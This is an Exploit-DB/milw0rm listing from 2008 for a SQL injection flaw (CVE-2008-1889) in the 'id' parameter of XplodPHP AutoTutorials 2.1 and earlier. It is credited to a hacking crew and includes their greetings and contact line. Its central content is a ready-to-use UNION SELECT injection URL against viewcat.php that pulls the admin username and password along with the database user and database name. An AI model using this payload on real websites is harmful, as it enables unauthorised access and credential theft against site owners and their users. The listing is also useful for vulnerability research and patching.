XplodPHP AutoTutorials <= 2.1 id SQL Injection Vulnerability

2008-04-16T00:00:00
ID EDB-ID:5457
Type exploitdb
Reporter cO2
Modified 2008-04-16T00:00:00

Description

XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability. CVE-2008-1889. Webapps exploit for php platform

                                        
                                                 [  A L G E R I A     S E C U R I T Y    C R E W  ]
###################################################
[~] XplodPHP Remote SQL Injection Vulnerability
                                                                                                               
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Exploit :
http://www.xxx.org/viewcat.php?id=10/**/union/**/select/**/null,user(),concat(username,0x3e,password),null,null,database(),null,null,null/**/from/**/admin/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-16]